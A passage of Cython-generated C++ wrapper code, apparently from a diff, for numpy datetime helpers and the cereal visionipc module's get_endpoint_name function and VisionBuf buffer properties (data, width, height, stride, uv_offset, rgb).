__pyx_f_5numpy_get_datetime64_value(PyObject *__pyx_v_obj) { + npy_datetime __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1038 + * also needed. That can be found using `get_datetime64_unit`. + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyDatetimeScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + +static CYTHON_INLINE npy_timedelta __pyx_f_5numpy_get_timedelta64_value(PyObject *__pyx_v_obj) { + npy_timedelta __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1045 + * returns the int64 value underlying scalar numpy timedelta64 object + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyTimedeltaScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + +static CYTHON_INLINE NPY_DATETIMEUNIT __pyx_f_5numpy_get_datetime64_unit(PyObject *__pyx_v_obj) { + NPY_DATETIMEUNIT __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1052 + * returns the unit part of the dtype for a numpy datetime64 object. + * """ + * return (obj).obmeta.base # <<<<<<<<<<<<<< + */ + __pyx_r = ((NPY_DATETIMEUNIT)((PyDatetimeScalarObject *)__pyx_v_obj)->obmeta.base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":20 + * + * + * def get_endpoint_name(string name, VisionStreamType stream): # <<<<<<<<<<<<<< + * return cpp_get_endpoint_name(name, stream).decode('utf-8') + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_1get_endpoint_name(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_1get_endpoint_name = {"get_endpoint_name", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_1get_endpoint_name, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_1get_endpoint_name(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + std::string __pyx_v_name; + enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_stream; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_endpoint_name (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,&__pyx_n_s_stream,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 20, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stream)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 20, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("get_endpoint_name", 1, 2, 2, 1); __PYX_ERR(0, 20, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_endpoint_name") < 0)) __PYX_ERR(0, 20, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_name = __pyx_convert_string_from_py_std__in_string(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 20, __pyx_L3_error) + __pyx_v_stream = ((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)__Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(values[1])); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 20, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_endpoint_name", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 20, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.get_endpoint_name", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_get_endpoint_name(__pyx_self, __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_name), __pyx_v_stream); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_get_endpoint_name(CYTHON_UNUSED PyObject *__pyx_self, std::string __pyx_v_name, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_stream) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_endpoint_name", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":21 + * + * def get_endpoint_name(string name, VisionStreamType stream): + * return cpp_get_endpoint_name(name, stream).decode('utf-8') # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_decode_cpp_string(get_endpoint_name(__pyx_v_name, ((enum VisionStreamType)__pyx_v_stream)), 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":20 + * + * + * def get_endpoint_name(string name, VisionStreamType stream): # <<<<<<<<<<<<<< + * return cpp_get_endpoint_name(name, stream).decode('utf-8') + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.get_endpoint_name", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":33 + * cdef class VisionBuf: + * @staticmethod + * cdef create(cppVisionBuf * cbuf): # <<<<<<<<<<<<<< + * buf = VisionBuf() + * buf.buf = cbuf + */ + +static PyObject *__pyx_f_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_create(VisionBuf *__pyx_v_cbuf) { + struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_buf = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("create", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":34 + * @staticmethod + * cdef create(cppVisionBuf * cbuf): + * buf = VisionBuf() # <<<<<<<<<<<<<< + * buf.buf = cbuf + * return buf + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_buf = ((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "cereal/visionipc/visionipc_pyx.pyx":35 + * cdef create(cppVisionBuf * cbuf): + * buf = VisionBuf() + * buf.buf = cbuf # <<<<<<<<<<<<<< + * return buf + * + */ + __pyx_v_buf->buf = __pyx_v_cbuf; + + /* "cereal/visionipc/visionipc_pyx.pyx":36 + * buf = VisionBuf() + * buf.buf = cbuf + * return buf # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_buf); + __pyx_r = ((PyObject *)__pyx_v_buf); + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":33 + * cdef class VisionBuf: + * @staticmethod + * cdef create(cppVisionBuf * cbuf): # <<<<<<<<<<<<<< + * buf = VisionBuf() + * buf.buf = cbuf + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.create", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_buf); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":38 + * return buf + * + * @property # <<<<<<<<<<<<<< + * def data(self): + * return np.asarray( self.buf.addr) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_4data_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_4data_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_4data___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_4data___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + void *__pyx_t_4; + struct __pyx_array_obj *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":40 + * @property + * def data(self): + * return np.asarray( self.buf.addr) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_np); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_asarray); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_4 = __pyx_v_self->buf->addr; + if (!__pyx_t_4) { + PyErr_SetString(PyExc_ValueError,"Cannot create cython.array from NULL pointer"); + __PYX_ERR(0, 40, __pyx_L1_error) + } + __pyx_t_6 = __pyx_format_from_typeinfo(&__Pyx_TypeInfo_nn___pyx_t_5numpy_uint8_t); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_2 = Py_BuildValue((char*) "(" __PYX_BUILD_PY_SSIZE_T ")", ((Py_ssize_t)__pyx_v_self->buf->len)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_5 = __pyx_array_new(__pyx_t_2, sizeof(__pyx_t_5numpy_uint8_t), PyBytes_AS_STRING(__pyx_t_6), (char *) "c", (char *) __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, ((PyObject *)__pyx_t_5)}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF((PyObject *)__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":38 + * return buf + * + * @property # <<<<<<<<<<<<<< + * def data(self): + * return np.asarray( self.buf.addr) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF((PyObject *)__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.data.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":42 + * return np.asarray( self.buf.addr) + * + * @property # <<<<<<<<<<<<<< + * def width(self): + * return self.buf.width + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_5width_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_5width_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_5width___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_5width___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":44 + * @property + * def width(self): + * return self.buf.width # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_FromSize_t(__pyx_v_self->buf->width); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":42 + * return np.asarray( self.buf.addr) + * + * @property # <<<<<<<<<<<<<< + * def width(self): + * return self.buf.width + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.width.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":46 + * return self.buf.width + * + * @property # <<<<<<<<<<<<<< + * def height(self): + * return self.buf.height + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6height_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6height_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6height___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6height___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":48 + * @property + * def height(self): + * return self.buf.height # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_FromSize_t(__pyx_v_self->buf->height); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":46 + * return self.buf.width + * + * @property # <<<<<<<<<<<<<< + * def height(self): + * return self.buf.height + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.height.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":50 + * return self.buf.height + * + * @property # <<<<<<<<<<<<<< + * def stride(self): + * return self.buf.stride + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6stride_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6stride_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6stride___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6stride___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":52 + * @property + * def stride(self): + * return self.buf.stride # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_FromSize_t(__pyx_v_self->buf->stride); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 52, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":50 + * return self.buf.height + * + * @property # <<<<<<<<<<<<<< + * def stride(self): + * return self.buf.stride + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.stride.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":54 + * return self.buf.stride + * + * @property # <<<<<<<<<<<<<< + * def uv_offset(self): + * return self.buf.uv_offset + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_9uv_offset_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_9uv_offset_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_9uv_offset___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_9uv_offset___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":56 + * @property + * def uv_offset(self): + * return self.buf.uv_offset # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_FromSize_t(__pyx_v_self->buf->uv_offset); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":54 + * return self.buf.stride + * + * @property # <<<<<<<<<<<<<< + * def uv_offset(self): + * return self.buf.uv_offset + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.uv_offset.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":58 + * return self.buf.uv_offset + * + * @property # <<<<<<<<<<<<<< + * def rgb(self): + * return self.buf.rgb + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3rgb_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3rgb_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3rgb___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3rgb___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":60 + * @property + * def rgb(self): + * return self.buf.rgb # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->buf->rgb); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":58 + * return self.buf.uv_offset + * + * @property # <<<<<<<<<<<<<< + * def rgb(self): + * return self.buf.rgb + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + 